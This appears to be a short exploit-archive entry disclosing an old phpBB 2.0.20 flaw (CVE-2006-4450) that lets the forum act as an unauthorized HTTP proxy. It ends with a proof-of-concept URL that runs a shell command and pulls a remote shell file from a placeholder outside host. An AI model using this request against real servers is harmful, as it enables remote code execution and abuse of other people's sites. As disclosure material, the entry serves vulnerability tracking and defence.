phpBB 2.0.20 - Unauthorized HTTP Proxy
| EKU-ID: 33124 | CVE: CVE-2006-4450;OSVDB-25565 | OSVDB-ID: |
| Author: rgod | Published: 2006-05-12 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 33124 | CVE: CVE-2006-4450;OSVDB-25565 | OSVDB-ID: |
| Author: rgod | Published: 2006-05-12 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/17965/info phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy. An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy. http://www.example.com/somescript.php?cmd=ls%20-la&xpl=http://www.example2.com/someshell.txt